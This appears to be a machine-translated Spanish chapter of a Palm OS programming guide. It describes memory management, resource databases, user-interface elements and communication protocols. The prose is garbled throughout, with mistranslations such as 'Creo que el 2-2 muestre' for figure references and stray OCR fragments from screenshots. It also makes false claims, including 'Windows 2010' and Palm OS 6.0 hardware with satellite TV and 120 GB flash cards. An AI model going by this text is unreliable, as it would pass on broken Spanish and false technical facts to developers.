Porque la memoria es un activo tan limitado en un Palm OS de mano, las aplicaciones no copian datos de un 
almacenamiento acopie para el montón dinámico para modificarlo los computadores de escritorio de forma 
copian datos de la unidad de disco duro para la memoria. Los datos y gerentes de memoria en el Palm OS 
cierran trozos individuales de memoria y les editan en el lugar. 

La RAM sirve para almacenamiento permanente, y aun los mejores programadores pueden introducir errores 
en su código eso escriba para la dirección equivocada de memoria. Por esto, el Palm OS no dará una 
aplicación permiso de cambiar los contenidos de cualquier trozo de memoria de almacenamiento sin usar la 
memoria y los APIs del administrador de datos. Se logra todavía cambiar los contenidos de memoria 
dinámica, sin embargo, así es que sea seguro para usar cautela al escribir para el montón dinámico. 

Los registros en una base de datos pueden esparcirse a través de montones múltiples de almacenamiento e 
intercalados con registros de otras bases de datos. También pueden ser localizados en ROM como parte de 
las aplicaciones que se embarcan con los OS. La única restricción en la localización de registros individuales 
es esa todos los registros en una base de datos dada deben residir en la misma tarjeta de memoria. 

La referencia cruzada Part IV, " Almacenando Información en el Palm OS Handheld, " provee detalles acerca 
de usar al administrador de datos Palm OS manipular bases de datos y registros. 


Usando recursos 


Palm OS está compuesta de recursos, Los cuáles son los bloques que representan datos, el código 
ejecutable, los elementos de la interfaz del usuario, y otros partes de la aplicación. 

Los recursos pueden ser reacomodados en la memoria, Así cada uno es identificado con 4-byte como 
nombre de recurso (como tBTN para un botón de comando) y 2- bytes como ID. 

Tres tipos de recursos son como sigue: 

. Los recursos de sistema 

. Recursos catalogados 

. Recursos proyecto 

Los recursos de sistema incluyen el código de aplicación de el mismo, las estructuras de datos para iniciar 
las variables globales de la aplicación, y al iniciar Ó encender la palm se requiere información por el OS para 
lanzar las aplicaciones. Estos recursos se forman usualmente por el ambiente de desarrollo del código fuente 
que usted ha escrito. 

Los recursos del catálogo incluyen los elementos diversos de la interfaz del usuario, de etiquetas para 
botones a sroll bars. Usted debe crear estos recursos por usted mismo, suministrar identificadores para que 
su código pueda usarlos durante la ejecución. 


Los recursos de proyecto incluyen cosas que se estableció referencias para a todo lo largo de su aplicación, 
como formas, alertas de diálogos, y menús. Usted también debe crear estos recursos por usted mismo. 
Algunos recursos de proyecto, como formas, sirven como contenedores de catalogo de recursos y otros 
recursos de proyecto 

Una aplicación Palm OS es realmente una base de datos de recurso. Contiene todo el código, interfaz del 
usuario, y otros recursos necesarios para poner en funcionamiento la aplicación correctamente. 

En la computadora de escritorio, los archivos de base de datos de recurso acaban en la extensión .PRC, así 
es que las bases de datos de recurso son a menudo llamados archivos PRC. 

Los recursos también tienen en cuenta localización más fácil de una aplicación. Porque todos los elementos 
de la interfaz del usuario y las cadenas de caracteres de una aplicación pueden ser guardados en recursos 
separados de la aplicación del código, traduciendo una aplicación a otro lenguaje es una materia simple de 
reconstrucción los recursos en el lenguaje nuevo. El usar esta modulación asegura que su código a correr 
para la aplicación no necesite estar cambiado o recompilando para localizar la aplicación. 


Referencia ; En el Capítulo 6, " Creando y Entendiendo Recursos, " se informa acerca de los recursos a 
detalle. 


Diseñando la Interfaz del Usuario 


Palm OS provee una variedad de recursos que representan elementos de la interfaz del usuario. 

La porción visible de una aplicación Palm OS está donde la interacción del usuario ocurre, así es que es 
importante saber qué herramientas están disponibles y cómo operan. Más que cualquier otro papel de una 
aplicación, la interfaz del usuario separa una buena aplicación Palm OS de uno que es frustrante para usar. 
Cada elemento de la interfaz del usuario en el Palm OS es un recurso que usted basa y entonces compila en 
su aplicación. Los ambientes diferentes de desarrollo proveen formas diferentes de recursos generadores de 
la interfaz, pero su código se ocupará de ellas en la misma forma y no importa saber de donde vinienenron a 
partir de ellos. 

Esta sección introduce los elementos de la interfaz del usuario disponibles en el Palm OS, describe su 
función, y da ejemplos de cada uno. 


La referencia ; El capitulo 9 Complementa detalles para elementos de programacion de la interfaz del 
usuario 


Formas (Formulario) 


Si ha programado en Visual Basic.Net entiendase como formulario donde podemos incluir controles que 
depues lo podemos orientar a objetos con Visual C++ / C++ 
Una Form (Formulario) Provee un contenedor , ambos visual y programatico, para elementos de la interfaz 
del usuario. 
Las formas contienen otros elementos de la interfaz del usuario. Una forma dada usualmente representa una 
sola pantalla en una aplicación o una ventana de diálogo modal. Creo que el 2-2 muestre formas diferentes 
de las aplicaciones incorporadas. Echo de ver que los tamaños diferentes de formas son posibles. 
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2-2 figura: 
Los formularios de palm OS pueden ser de tamaños diferentes y pueden contener una variedad de 
elementos de la interfaz del usuario. 


Cada aplicación debe constar al menos un formulario, y la mayoría contiene más que el único para exhibir 
vistas diferentes y diálogos. La mayoría de formas ocuparán el área entero de la pantalla, excepto para los 
diálogos, que puede ocupar menos la altura que una forma de la pantalla llena pero todavía puede ocupar la 
anchura entera de la pantalla. 

Opcionalmente los formularios puede tener las siguientes características: 

.- Una barra de títulos. 

.- Una barra de menús asociada. 

.- Unos icono de tips (sólo en formas modales) 

El icono de consejos aparece como una parte pequeña de la que se hizo un círculo alrededor “i ” en la 
esquina superior derecha de una forma con una barra de títulos (vea la tercera forma descrita en Figure 2-2). 
Si el usuario golpea ligeramente el icono entonces otro diálogo se abre, ostentando información útil acerca 
del diálogo contenida en el icono. 


Añadiremos Tips para crear in Tip de diálogo en el Chapter 7, “ Creando a Forms.” 


Alertas 


Las alertas proveen una facilidad para desplegar diálogos modales simples para el usuario. Un diálogo alerta 


es un tipo especial de forma con una barra de títulos, un mensaje del texto, uno o más botones, y un icono. 
Las alertas también pueden tener un icono de Tips "i" algo así como formas. 

Una alerta puede tener uno de los cuatro tipos siguientes: 

. Información. 

Un diálogo de información exhibe uno “ ¡” el icono, lo cual es similar al icono de tips, pero más grande. Se 
Usa para dar al usuario información simple, o informar al usuario que la acción demandada no puede o no 
debería ser realizada. Tal acción no debería generar un error o debería resultar en pérdida de datos. Las 
alertas de información también pueden servir como la aplicación simple “ About Acerca de ” Cajas. 

. Confirmación. 

¿Un diálogo del tipo de confirmación exhibe uno “?” El icono. Pregunta al usuario acerca de entrada o la 
confirmación y provee un número de botones de los cuales el usuario pueda escoger. 

. Advertencia. 

Un diálogo preventivo exhibe un icono. Este tipo de diálogo debería usarse para pedir confirmación cuando 
el usuario demanda una acción potencialmente peligrosa. La diferencia entre una advertencia y una 
confirmación que el diálogo está ya sea que la acción es reversible o no. Use un diálogo de confirmación si la 
acción puede ser a la que se puso al revés o si los datos suprimidos como resultado de la acción pueden ser 
respaldados al computador de escritorio. Use un diálogo preventivo si la pérdida permanente de datos puede 
resultar de alguna mala acción. 

. Error. 

Un diálogo de error exhibe una señal de alto circular que contiene un blanco * X.” 

Use este tipo de avizo para informar al usuario que la última acción causó un error o no podría ser 
completada. 

Si los sonidos son posibilitados en el dispositivo, entonces los tipos diferentes de alertas también producirán 
sonidos diferentes cuando sean exhibidos. Creo que el 2-3 muestre ejemplos de todos los cuatro tipos de 
alertas de las aplicaciones incorporadas. 
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El 2-3 figura: diálogos de alerta de cuatro sabores 
Alertas: información, confirmación, error, y la advertencia. 


Los menús 


Los menús proveen acceso para órdenes sin ocupar espacios preciosos de la pantalla. 

Cada menú contiene único o más artículos del menú, cada uno del cual le puede tener un atajo de alguna 
orden asignado para él. Un atajo de orden es un solo carácter que da a acceso Graffiti permiso de un menú 
la orden del artículo. Si el usuario introduce la orden Graffiti golpe, imaginado en Figure 2-4, seguido por un 
carácter del atajo del menú, entonces el artículo correspondiente del menú es activado. El punto en la figura 
representa donde el golpe debería comenzar. 


El 2-4 figura: El golpe de orden Graffiti Provee acceso rápido para los comandos de menú. 


Para visualizar artículos agrupados del menú, use una barra separadora. En el recurso del menú, una barra 
del separador es simplemente otro menú ítem con propiedades especiales. Hay una barra del separador 
descrita en Figure 2-5, entre el * Select Todo ” y “* Keyboard ” artículos del menú. 

Los menús mismos están contenidos en una barra de menús. Puede haber barra de menús de única 
asignada para cualquier forma dada. Creo que el 2-5 muestre una sola barra de menús, uno de sus menús, y 
los artículos del menú de ese menú. 
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La referencia; Creando menú los recursos está cubierto en Capitulo 8, y programándolos está detallado en 
Chapter 9. 


Tablas 


Las tablas son una forma para ostentar datos en columnas. Una tabla puede organizar un número de otros 
elementos de la interfaz del usuario dentro de sus filas y las columnas. Los objetos contenidos en una fila o 
la columna de una tabla a menudo contienen el mismo tipo de objetos. Por ejemplo, en una tabla de dos 
columnas, la primera parte que la columna podría contener etiqueta y los segundos campos del texto de la 
columna. 

Una tabla puede ser enrollada verticalmente para exhibir más filas de datos que se probará la pantalla de 
inmediato. Las tabla no pueden ser enrolladas horizontalmente, sin embargo. Creo que el 2-6 muestre tabla 
de las aplicaciones a incorporada en TODO List y del Libro de direcciones por default preinstaladas en las 
palm . Advierta la variedad de cosas diferentes que las células de una tabla pueden contener. Este tipo de 


flexibilidad hace de la tabladifícil de interconectar elementos para implementar correctamente por el usuario. 
También lo hace más útil. 


El 2-6 figura: Las tablas son altamente Modificables, y pueden Contener muchos elementos deferentes de la 
interfaz. 


Las listas 


Una lista es ideal para filas múltiples que exhiben datos en una sola columna. Como una tabla, puede usar 
sroll verticalmente para exhibir más artículos que puede mostrarse en la pantalla al mismo tiempo. en Palm 
OS se dibujan líneas señalizadores (flechas pequeñas) en las esquinas de una lista para señalar que la lista 
puede continuar mostrando más artículos hacia abajo. A diferencia de una tabla, una lista no es 
adecuadamente adecuada exhibiendo datos dinámicos. Use una lista para ofrecer elecciones fijas para el 
usuario; Use una tabla para dar al usuario permiso directamente editar filas exhibidas. 

Los recursos de la lista pueden ser exhibidos en dos formas diferentes. Si usted incluye una lista 
directamente en una forma y la coloca para ser visible, entonces el sistema sacará la lista con esquinas 
cuadradas y le exhibirá como un elemento estático(Fijo) de la interfaz del usuario. Alternativamente, usted 
puede asociar una lista poco visible con un pop-up de aparición automática para crear una lista de aparición 
automática. Sacado en la pantalla con esquinas redondeadas, una pop-up list guarda el estado real de la 
pantalla quedándose escondido hasta el usuario realmente lo necesite al seleccionar un artículo . En lugar de 
ocupar mucha pantalla con artículos numerosos de una lista, sólo un solo artículo, exhibido en la mensaje de 
aparición automática asociada pop-up, las necesidades para aparecer en la pantalla. Ambos tipos de listas 
son mostrados en la figura 2-7 


br - Breakfast 
di - Dinner 
ds - [Date Stamp) 


Personal 
dts - [Date and Time Starn Eb 


Unfiled 


Edit Categories... 
rre - Meeting L datedorie 


t3 - [Time Stamp] 


El 2-7 figura: Las listas pueden ser elementos estáticos (la izquierda) de la interfaz del usuario, o pueden ser 
listas de aparición automática asociadas con un pop-up de aparición automática (bien). 


Mensajes de aparición automática (Pop-ups) 


Un pop-up de aparición automática consta de una flecha de la orientación descendente para la izquierda de 
una etiqueta del texto, lo cual puede cambiar su anchura para acomodar cambios en el texto. Los pop-up de 
aparición automática permiten al usuario escoger un artículo de una lista asociada sin ocupar ese precioso 
espacio de la pantalla exhibiendo una lista entera. Sólo la lista actualmente seleccionada ítem es exhibida en 
la etiqueta que accionemos y veremos una aparición automática. 

Cuando el usuario taca la flecha o la etiqueta del texto con su lapiz optico en un (pop-up) mensaje de 
aparición automática, la lista asociada del pop-up es exhibida. Si el usuario golpea ligeramente un artículo 
nuevo de la lista, entonces la lista desaparece y los cambios del encabezamiento del gatillo de aparición 
automática para el artículo recién seleccionado. Si el usuario toca afuera de la lista mientras es exhibida, 
entonces la lista desaparece y el texto del pop-up aparición automática permanece ahy mismo. 

El lugar más común donde los pop-up de aparición automática aparezcan en las aplicaciones incorporadas 
está en la esquina superior derecha de una forma para la selección de una categoría. Lospop-up de 
aparición automática hacen uso muy eficiente de espacio de la pantalla. Creo que el 2-8 muestre una lista de 
aparición automática al lado de la lista que aparece cuando el pop-up de aparición automática es al que se 
golpeó ligeramente. 


Buttons 
Digitizer 
Formats 
* General General 


Modern 
MHetwork 
Owner 


Shortíuts 


El 2-8 figura: Un pop-up de aparición automática (la izquierda) y su lista asociada (bien) 


Los botones 


Los botones se usan para ejecutar órdenes o interruptor para otras pantallas en una aplicación con un solo 
golpe ligero . Un botón usualmente tiene un marco redondeado y contiene un encabezamiento del texto, pero 
los botones rectangulares y frameless son también posibles. Los botones resaltan cuando son golpeados 
ligeramente hasta que el usuario levante el estilete o arrastre el estilete fuera de los confines del botón. Creo 
que el 2-9 muestre algunos botones de muestra de las aplicaciones incorporadas. 

Los botones de uso para las funciones más frecuentemente usadas en una aplicación. Requerir que sólo un 
solo golpe ligero active una orden, abotonar es el elemento más rápido de la interfaz del usuario con el cual 
el usuario puede interactuar. Los botones son perfectos para crear registros nuevos, evocando detalles en un 
registro particular, y cambiando entre formularios principales en una aplicación. 


[ Mew ] | Details... ] [ Show... | 


El 2-9 figura: Los botones tienen en cuenta acceso rápido para las órdenes comúnmente usadas. 


Repitiendo Botones 


Un botón diferente, que envía acontecimiento de único cuando es golpeado ligeramente, un botón repetitivo 
continúa poniendo acontecimientos en la cola de acontecimiento mientras el usuario mantiene el lapiz optico 
abajo de él. Los botones repetitivos sirven comúnmente para desplazarse a otros elementos de la interfaz del 
usuario, como tablas. Aunque un botón repetido puede exactamente parecerse a un botón normal, están 
usualmente definidos sin bordes. En Palm OS tiene algunos carácteres de imprenta del símbolo que 
contienen imagenes de flecha adecuados para el uso como encabezamientos en repetir botones. La mayor 
parte de las aplicaciones incorporadas usan un par de botones repetitivos con flechas en ellos como 
controles del To Do List que se incluye en palm por default. 

Creo que el 2-10 muestra el par de botones repetitivos usados como sroll para otras ordenes de usuario . 


2-10 figura: Los botones repetitivos sirven adecuadamente para enrollar otros elementos de la interfaz del 
usuario. 


La referencia ; En el Capítulo 7 contiene más detalles acerca de la instalación al repitir recursos de botónes 
para imitar los botones de la flecha en las aplicaciones incorporadas. 


El botón de selección (exclusivo para fechas de sistema) 


Un boton de seleccion ostenta un valor dentro de una caja rectangular con un borde de línea punteada. 
Cuando el usuario golpea ligeramente la caja, un diálogo aparece eso da al usuario permiso de cambiar los 
datos desplegados en la caja. El botón selector crece o se encoge y hace juego con la anchura de los 
valores que ostenta. 

El uso más común de un botón selector es permitir selección de un tiempo o la fecha. 

Hay funciones en el Palm OS para ostentar hora oficial y fechas de diálogos que se recogen, y éstos trabajan 
perfectamente con controles de selección. Si los datos que usted ostenta en un selector no es un tiempo o 
una fecha, o usted tiene el deseo de salir a la vista, entonces un diálogo diferente de esos da abasto para los 
OS, usted debe suministrar el diálogo que aparece cuando el usuario toque en un botón selector. 

El 2-11 figura muestra botones selectores de diálogo Event Details en la aplicación Date Book incorporado. 
Echo de ver que el encabezamiento de un selector puede ser cualquier cadena de texto que usted escoge. 


El 2-11 figura: Los controles de selección ostentan un valor que se editó por el golpeteo del usuario en el 
control. 


(Presionando Botones) Push Buttons 


Los botones realizan la misma función como botones de radio en otras interfaces gráficas. 

Un botón siempre ocurre en un conjunto de dos o más botones. El botón de único en el grupo puede ser 
seleccionado a la vez, y ese botón es resaltado. 

Use un grupo de botones cuando usted necesita regalar al usuario sólo un número pequeño de opciones 
para un valor particular. Si usted necesita que el usuario seleccionara entre un número grande de valores, o 
si esos valores pueden convertirse en de tiempo el tiempo, entonces use una lista. 

Creo que el 2-12 muestre ejemplos de botones de las aplicaciones incorporadas. 


2-12 figura: Los botones permiten selección de un solo ítem de un grupo de elecciones. 


Selección de cajas de control 


Use una casilla de verificación indicar una colocación que puede ser cambiado ya sea adelante o 
completamente. Una casilla de verificación consta de un cuadrado y un encabezamiento del texto. Si el 
escenario indicado por la casilla de verificación está apagado (No seleccionado), entonces el cuadrado está 
vacío; Si el escenario está encendido, entonces el cuadrado contiene una Cruz ó un punto de seleccion. 
Golpee ligeramente una Check box (caja de selcción) o el encabezamiento derechos del texto que muestra la 
caja de selección de una casilla de verificación. El texto de una casilla de verificación siempre aparece a la 
derecha del cuadrado. Si usted quiere una casilla de verificación para ser designado a la izquierda, deje 
encabezamiento del texto de la casilla de verificación vacía y coloque un recurso de la etiqueta para la 
izquierda de la casilla de verificación (véa las “ Labels ó etiquetas de texto” en este capítulo). 

, las cajas de chequeo también pueden estar organizadas en grupos a fin de que en la casilla de verificación 
solo pueda seleccionar una opción. Los botones son mejores para indicar elecciones exclusivas, sin 
embargo, porque proveen una mejor pista visual que son parte de un grupo. Las casillas de verificación son 


mejores para situaciones donde más que lo que un escenario puede encenderse a la vez. 
Dos casillas de verificación, una selccionada y el otra vacía, son mostradas en la figura 2-13. 


E Show Completed Items 
O 5how Only Due ternas 


2-13 figura: Las casillas de verificación permiten al usuario sujetarse solo a instrucciones especificas. 


Etiquetas (Labels) 


Es simplemente un poco de texto no editable que aparece en una forma o en una tabla. El uso de una 
etiqueta provee descripciones de otros elementos de la interfaz del usuario. Por ejemplo, colocando una 
etiqueta conteniendo el texto * Date:” a la izquierda de un control selector dice el usuario que el golpeteo que 
control selector cambiará la fecha listada en el selector. Las etiquetas también operan para proveer 
instrucciones o información en las ventanas de diálogo. 

Creo que el 2-14 muestra etiquetas de algunas aplicaciones incorporadas diferentes. 


Priority Enter a passuprd: 
Category: 
A E If you assign a password, you 
Private: must enter it to show private 

records. 


2-14 figura: Las etiquetas describen elementos de la interfaz del usuario o aportan información para el 
usuario y no son editables. 


Los Mapas de Bits ( Bitmaps ) ó Imagenes 


puede tener uno o más mapas de bits (bitmaps) asociados con un formulario. Los bitmaps de un formulario 
se usan típicamente para exhibir iconos, como esos usados por los diálogos de alertas en el sistema 
operativo Windows 2010. Un bitmap también se vera bien como un logotipo para un formulario de acerca de 
este programa. 

Los bitmaps de un formulario simplemente atribuyen un recurso predefinido del bitmap para una forma y 
especifican donde en la forma el bitmap debería aparecer. Creo que el 2-15 muestre un ejemplo de un 
bitmap de un formulario. 


Referencia ; Si desea que un bitmap cambie su hubicación dentro de una forma, entonces usted debe usar la 
función WinDrawBitmap. El Capítulo 9 explica cómo. 


2-15 figura: Un bitmap de un formulario 


Fields (cajas de entrada y salida de texto editables) 


Las cajas de entrada y salida de texto permiten edición en su sitio de texto por la entrada Graffiti o el teclado 
de en pantalla. Un campo del texto es también útil para exhibir texto poco editable que puede cambiar como 
el programa marche; Las etiquetas pueden servir para este propósito, pero están algo más limitadas en los 
cuales pueden hacer que un campo del texto. 

Los campos pueden ser una línea sola o una multilínea. Los campos de una sola línea pueden ser uno u otro 
con salida de texto justificado a la derecha, y no aceptan a los controles Tab o Return del teclado virtual. Los 
campos Multiline pueden estar colocados para cambiar altura dinámicamente, así cuándo el texto está 
añadido o removido del campo, se puede acomodar el texto. Las barras de desplazamiento son a menudo 
usadas en conjunción con campos de la multilínea para dejarlas contener muchas páginas de texto. 

El Palm OS sigue la pista al punto de inserción actual, un cursor que parpadea que indica cuál el campo en 
una forma es actualmente activo, así como también donde el texto recién introducido aparecerá. Usualmente, 
usted no necesitará preocuparse por la localización del punto de inserción, porque los OS manipulan todos 
los trabajos elementarios que la implementación detalla. 

Creo que el 2-16 muestra ambos tipos de cajas de texto ó TEXTBOX si programa en visual Basic ,Uno de 
una sola línea y Otro para texto multilínea. 


andheld bazics 


Tap Details to acces: 


2-16 figura: Los campos están usados para la entrada de texto y para exhibir cambios de texto. Descritos 
aquí hay un campo de multilínea (a la izquierda) y un campo de una sola linea (A la Derecha). 


El señalizador de Cambio del Graffiti 


Cada forma con campos editables del texto también debería contener un señalizador de cambio Graffiti, 
preferentemente en la esquina inferior derecha de la forma. El señalizador de estado muestra el estado 
actual de cambio del sistema de entrada del texto Graffiti: El atildamiento, el símbolo, el cambio de caja alta, 
O la caja alta echa llave. Esto provee una pista visual importante para el usuario que ayuda en la entrada de 
datos exacta. Olvidarse de añadir formulario que muestre el indicador del tipo de texto que estamos 
introduciendo hará que su aplicación sea frustrante para el usuario. 

Si su aplicación es diseñada para poner a funcionar en la versión Palm OS 1.0, sea seguro dejar espacio 


horizontal adicional para el señalizador de cambio Graffiti. En lugar de la flecha subrayada usada por 
versiones actuales de los OS a indicar bloqueo de caja alta, la versión 1.0 realmente exhibe las letras “ Caps 
Mayusculas” en el señalizador de cambio. 

Afortunadamente, un señalizador de cambio Graffiti es un elemento fácil de la interfaz del usuario para 
implementar; 

Simplemente incluya uno como un recurso en una forma, y el gestor de Palm OS Graffiti lo actualizará 
automáticamente como sea necesario. Creo que el 2-17 muestra un señalizador de cambio Graffiti en sus 
cuatro estados. Advierta la diferencia leve en el tamaño entre la versión 1.0 caja alta cerrar símbolo y el 
símbolo usado para versiones futuras del Palm OS. 


2-17 figura: Los cuatro estados de cambio Graffiti, imaginados de izquierda a derecha, son punctuación, 
symbolo, Mayusculas shift, y cerrar Mayusculas 


Barra de desplazamiento (Scroll Bars) 


El elemento de la barra de desplazamiento permite moverse verticalmente en el contenido de tablas, listas, 
listas, o campos de la multilínea. 

La flecha abotona arriba y el fondo de una barra de desplazamiento puede avanzar una sola línea a la vez 
cada que se presiona la flecha. Una barra sólida en la mitad de la barra de desplazamiento, llamada avance 
de carro, provee un señalizador visual de lo que contuvieron el porcentaje de los datos totales en el campo 
adjunto, lista, o mesa es actualmente exhibido en la pantalla. Los usuarios pueden conectarse con el área 
disfrazado citado anteriormente o debajo del carro del rollo del sroll bar para moverse a través de los datos 
una página a la vez, o pueden arrastrar el carro de la sroll bar para navegar directamente para una 
localización específica en los datos. 


Nota: Las barras de desplazamiento están disponibles desde la versión Palm OS 2.0 Palm Os 6.0 Cobalt No 
da problemas. Si su aplicación debe poner a funcionar en la versión 1.0, use repetidamente los botones del 
hardware para sustituir por la barra de desplazamiento. 


Implementar una barra de desplazamiento requiere una cierta cantidad de esfuerzo en su parte. Usted debe 
proveer comunicación de dos formas entre la barra de desplazamiento y la lista adjunta, Tabla, o campo en 
la siguiente manera: 

. Cuando los datos en el elemento adjunto requieren cambios de pantalla para moverse en sroll bars , su 
código debe alertar la barra de desplazamiento para el cambio así es que correctamente pueda posicionar y 
pueda dimensionar el carro de la barra de desplazamiento. 

. Cuando el usuario golpee ligeramente la barra de desplazamiento o sus flechas, o arrastre el carro de la 
barra de desplazamiento, sus necesidades de código a actualizar la lista, campo, o posponga para exhibir la 
porción apropiada de sus datos. Su aplicación puede actualizar el despliegue de datos en dos formas: 

* La actualización dinámica. Como los usuarios mantienen sujeta el lapiz optico en la barra de 
desplazamiento, el despliegue de datos cambia. Este método de actualización los datos provee a usuarios 
de retroalimentación instantánea acerca de su localización actual en los datos, pero puede ser lenta si el 
despliegue de datos en una tabla complicada con muchos tipos diferentes de datos a mostrar. 

* la actualización estática. El despliegue de datos cambia sólo después de que los usuarios sueltan el lapiz 
optico de la barra de desplazamiento. Este método requiere menos procesador y puede ser más apropiado 


para tablas complicadas. Puede ser frustrante para los usuarios, sin embargo, porque no hay indicación de 
dónde ellos esté en los datos hasta que se retire el lapiz optico, en cuál punto deben usar la barra de 
desplazamiento otra vez si el campo, la lista, o la tabla no ostenta los datos correctos. 

Creo que el 2-18 muestre una barra de desplazamiento. 


Figura 2-18: Una scroll bar 
Gadgets (Dispositivos) 


Si ninguno de los usuarios interconecta Dispositivos de Hardware en el Palm OS para trabajar, entonces 
usted puede hacer que un usuario personalize el interconectar un Dispositivo. un Dispositivo contiene 
información acerca de su localización en la pantalla, ya sea es actualmente utilizable o no, y un puntero para 
por unidad de datos. Usted debe implementar todo lo demás, de sacar un Dispositivo para responder al tocar 
con el lapiz optico . 

Porque usted tiene que hacer la masa del trabajo para implementar un Dispositivo de cualquier manera, 
usted puede pensar que usted podría poner como código sano para su propio objeto personalizado de la 
interfaz desde cero. un Dispositivo ofrece algunas ventajas sobre rodar su objeto, sin embargo: 

. Las cosas siguen la pista a sus saltos rectangulares en la pantalla, facilitar detectar si un golpe ligero 
particular en la pantalla estaba en un Dispositivo o no. Esto también crea cualquier código de dibujo para un 
Dispositivo más portátil, porque puede llevar las coordenadas de códigos duro requeridoras de la pantalla. 
Usted entonces puede usar su código deun Dispositivo en una aplicación diferente, o aun en una localización 
diferente en la misma forma, y usted no necesitará reescribir su código. 

. un Dispositivo mantiene un puntero para no importa qué datos que usted tiene el deseo de asociar con un 
Dispositivo. 
. Palm OS Emulator ( POSE) hace una prueba presentar a llamado Gremlins que al azar puede atizar en su 
aplicación y revelan problemas nos resueltos en el software a oscuras que usted de otra manera podría 
extrañar. Los duendes ocasionalmente tacan en las áreas aleatorias de la pantalla eso no contienen 
cualquier controles, pero son particularmente atraídos para elementos estándar de la interfaz del usuario. 
Codificar un elemento personalizado como una cosa asegure que Gremlins le dará a su interfaz 
personalizada una buena prueba. 

Referencia; Más información acerca de Gremlins está disponible en el Capitulo 5. 


Creo que el 2-19 muestra un dispositivo integrado en Date Book de la vista mensual . Esta cosa complicada 


saca una vista del calendario e indica citas con símbolos. El usuario puede escoger un día particular 
golpéanlodo ligeramente; Esto ostentará ese día particular en una pantalla diferente. 


AT 


2-19 figura: La vista de mes de la aplicación Date Book incorporado puede ostentar un montón de 
información a simple vista. 


Comunicándose con Otros dispositivos 


Una parte crucial de la computadora Palm es su éxito como plataforma que tiene una habilidad para 
comunicarse con otros dispositivos. Las versiones actuales del Palm OS ofrecen un número de protocolos 
diferentes de comunicaciones.Y las versiones de Palm Os 6.0 ya uncluyen hasta hardware para rastreo via 
satelital GPS,Una targeta para ver la televisión via satelital,Un sintonizador de radio FM,TV,AM, conexión a 
internet a alta velocidad 256 Kb, Memoria Flash de hasta 120 Gigas en una sola targeta de 1Cm cuadrado 
en targetas SD card,Soporte para red inalambrica, etc.... 


Conectividad Serial 


Los artificios de la palma OS usan el protocolo serial para poder sincronizar datos a través de un cable serial 
a la computadora de escritorio. Con el cable correcto o el hardware de terceros, con Palm OS también puede 
hablar telefonicamente remotamente para justamente acer cualquier cosa desde conectar modems para 
sondas de temperatura para aparatos receptores GPS. 

La arquitectura de comunicaciones Serial Palm OS soporta varios estratos de utilidad diversas y complejidad, 
incluyendo a l/O serial ecuánime en byte y protocolos que corrigen error de alto nivel. 


Referencia: Las comunicaciones Serial palma OS están cubiertas en detalle en el capitulo 15, “ Usando el 
Puerto Serial.” 


TCP/IP 


El protocolo estándar de la Internet, TCP/IP, Permite a un dispositivo Palm OS con el hardware adjunto 
correcto conectarse cualquier máquina en la Internet e intercambiar datos con él a traves de servidores. La 
mayor parte de las funciones en el Palm OS tienen librerias, lo cual provee conectividad TCP/IP en 
aplicaciones Palm OS, lo hace imagen idéntica de funciones en sockets(sockets=Dispositivos que 
transportan datos en una red) Berkeley Unix API, lo cual es el estándar efectivo para aplicaciones de la 


Internet. 
Las aplicaciones escritas para usar sockets Berkeley puede ser con holgura recompiladas para el Palm OS 
con sólo algunos cambios. 


Conexión Inalámbrica (Wireless) 


Introducida en la versión Palm OS 3.2, lo cual es instalado en el Palm VII, la comunicación inalámbrica en un 
dispositivo Palm OS tiene lugar por la red inalámbrica Palm.Net. 

Porque la banda ancha inalámbrico cuesta caro, el Palm OS sistema inalámbrico usa una estrategia llamado 
recorte de la Web minimizar la cantidad de datos que se transfirió entre el radio inalámbrico del dispositivo 
Palm OS y la red. Un usuario inalámbrico Palm OS pone a funcionar una Web recortando hoja de solicitud 
para demandar información, lo cual es entonces exhibido por Clipper, la aplicación del navegador residente 
en el dispositivo Palm OS. 


Nota: Las Applicaciones directamente no puedo ganar acceso a la Internet a través del modem inalámbrico 
del dispositivo Palm. Ésta es una limitación deliberada para minimizar la cantidad de datos expedidos a 
través de conexiones inalámbricas caras. 

En el lado del cliente, PQASs son fáciles para hacer, porque están cifrados en Hypertext Markup Language (el 
HTML) con sólo alguno Palm OS - las adiciones específicas, y entonces compilado utilizadores el rastreo 
libre de la aplicación construida (QAB). El fin del servidor de una PQA puede estar construido usando 
existiendo tecnologías de la Web, porque el servicio Palm.Net se comunica con el servidor por Hypertext 
estándar Transfer Protocol (el HTTP). 


Referencia: Más información acerca del servicio Palm.Net y PQAs la puede encontrar en la Parte VII. 
IrDA (comunicarse por el protocolo estándar Infrarrojo) 


Empieza con los dispositivos Palm lIl y Palm OS de versión 3.0, Palm pueden comunicarse por el protocolo 
Infrarrojo estándar en la industria Data Association (IrDA). Este protocolo de comunicaciones de bajo nivel 
puede usarse para comunicarse por infrarrojo (IR) con una variedad creciente de modo semejante equipares 
dispositivos, incluyendo teléfonos celulares, los paginadores, y aun el computador de escritorio o las laptops . 
como el puerto serial, Palm OS tiene librerias para funciones de infrarrojo IrDA para ofrecer control de bajo 
nivel para transferencia de datos IR. 


Referencia: La comunicación IrDA está cubierta en detalle en Capitulo 14. 

Beaming (Envio de Información) 

Palm OS provee facilidades para enviar información desde la palm a dispositivos por medio del puerto 
infrarrojo (IR) llamdos "Beaming". Aunque primordialmente usado para dirigir emisiones de información entre 
dos Palm OS handhelds, Tambien se puede para crear comunicaciones y compartir datos entre dispositivos 
diferentes. El intercambio es administrado para poner a funcionar una parte superior de la transferencia IrDA 
implementada en las librerias para infrarrojos de Palm OS. 


Referencias: Más información sobre como hacer un "beaming”" está disponible en el capitulo 13. 
Comparativa de las versiones Palm OS 


Muchos de los cambios entre modelos diferentes de dispositivos Palm OS que ustedes necesitará recordar 


son los cambios para el Palm OS mismo. Afortunadamente, tal como Palm y sus socios han cambiado el 
hardware incrementado, el Palm OS también ha evolucionado en un paso fácil, simplificando atrás 
compatibilidad muy para el implemento. Esta sección provee una visión general breve de qué ha cambiado 
desde la versión 1.0 del Palm OS. 

Porque un número de funciones nuevas se han agregado para el Palm OS con cada nueva versión, el 
sistema provee facilidades para fácilmente determinar qué características son respaldadas en el ambiente 
actualmente corredor. Si su aplicación usa funciones de versiones más nuevas de los OS, entonces pondrá a 
funcionar más lisamente si usted inspecciona para la existencia de esas características antes de llamarlos. 
La comprobación para el número de versión del sistema operativo aisladamente no es suficiente porque las 
versiones futuras del Palm OS necesariamente no implementarán todas las características de anteriores 
versiones. En lugar de eso, el sistema puede poner en duda si los sets específicos de rasgo están presentes 
en la versión del Palm OS en el cual su aplicación corra. 


